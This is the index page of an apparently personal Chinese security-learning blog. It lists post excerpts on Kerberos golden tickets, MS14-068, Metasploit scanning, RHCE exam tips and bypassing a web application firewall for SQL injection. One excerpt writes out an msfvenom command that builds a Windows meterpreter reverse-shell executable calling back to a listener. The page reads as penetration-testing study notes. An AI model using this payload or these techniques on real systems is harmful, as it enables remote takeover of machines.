论安全萌新的自我修养

   :: 首页  :: 新随笔  :: 联系 :: 订阅 订阅  :: 管理

2020年2月26日

摘要: 黄金票据(Golden Ticket)是有效的 TGT(TicketGranting Ticket)票据,是由 kerberos账户(krbtgt)加密的。然而krbtgt仅在域控上才用,意味着你已经拿到了域控,用于域控权限掉后,想再重新获取。因为域控的密码可能更改, 通常 kbrtgt 账户不会有 阅读全文
posted @ 2020-02-26 21:48 Yangsir34 阅读(802) 评论(0) 推荐(0)

2020年2月23日

摘要: MS14-068是密钥分发中心(KDC)服务中的Windows漏洞。它允许经过身份验证的用户在其Kerberos票证(TGT)中插入任意PAC(表示所有用户权限的结构)。该漏洞位于kdcsvc.dll域控制器的密钥分发中心(KDC)中。用户可以通过呈现具有改变的PAC的Kerberos TGT来获得 阅读全文
posted @ 2020-02-23 14:36 Yangsir34 阅读(503) 评论(0) 推荐(0)

摘要: 被控端生成:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.139 LPORT=2345 -f exe > /root/yangtest.exe msf配置如下当被控端运行后即可上线:msf5 > use exploit/mul 阅读全文
posted @ 2020-02-23 13:05 Yangsir34 阅读(1741) 评论(0) 推荐(0)

摘要: 报错如下: [*] Bundler failed to load and returned this error: 'cannot load such file -- bundler/setup'[*] You may need to uninstall or upgrade bundler 解决如 阅读全文
posted @ 2020-02-23 12:56 Yangsir34 阅读(597) 评论(0) 推荐(0)

2020年2月21日

摘要: 整理不易,转载请加原文链接:https://www.cnblogs.com/Yang34/p/12343672.html 补充下msf与数据库连接 结合nmap如下: 发现内网服务 use auxiliary/scanner/http/http_version 发现http服务 use auxili 阅读全文
posted @ 2020-02-21 23:17 Yangsir34 阅读(643) 评论(0) 推荐(0)

2020年1月7日

摘要: 手滑把配置文件删除了,reinstall并没有重新装出来配置文件,最后发现需要一个个卸载包了。 卸载完重新装包即可。 apt-get remove openssh-server openssh-client --purge apt-get autoremove apt-get autoclean a 阅读全文
posted @ 2020-01-07 17:21 Yangsir34 阅读(1005) 评论(0) 推荐(0)

2020年1月3日

摘要: 祝各位成功! 转发请注明地址:https://www.cnblogs.com/Yang34/p/12145363.html 答题顺序:1)看考试说明(提供地址、用户、软件资源、注意事项、用户密码、网段地址)2)整体浏览所有考试题3)两台虚拟机的root密码是预先告知的,不需要重设4)两台虚拟机的主机 阅读全文
posted @ 2020-01-03 15:56 Yangsir34 阅读(266) 评论(0) 推荐(0)

摘要: 祝各位成功! 转发请注明地址:https://www.cnblogs.com/Yang34/p/12145357.html 答题顺序:1)看考试说明(提供地址、用户、软件资源、注意事项)2)整体浏览所有考试题(用户/权限、分区)3)过重设密码+配置网络两关4)先做高风险题(分区操作、装新内核)5)再 阅读全文
posted @ 2020-01-03 15:55 Yangsir34 阅读(232) 评论(0) 推荐(0)

2019年12月21日

摘要: 1)配置selinuxvim /etc/slinux/config SELINUX=enforcingsetenforce 1getenforce两台都做2)配置SSHvim /etc/ssh/sshd_config DenyUsers *@*.my133t.org *@172.34.0.*syst 阅读全文
posted @ 2019-12-21 15:36 Yangsir34 阅读(283) 评论(0) 推荐(0)

2019年12月17日

摘要: 转载请加原文链接:https://www.cnblogs.com/Yang34/p/12055052.html 微信公众号:信Yang安全。同步更新,欢迎关注。文末有二维码。 正好最近在搞注入,昨天现装的安全狗练练手,搭建环境如下图: 拦截日志如下: 过产品第一步想法是确定哪些会被拦截,哪些不会被拦 阅读全文
posted @ 2019-12-17 16:02 Yangsir34 阅读(599) 评论(0) 推荐(0)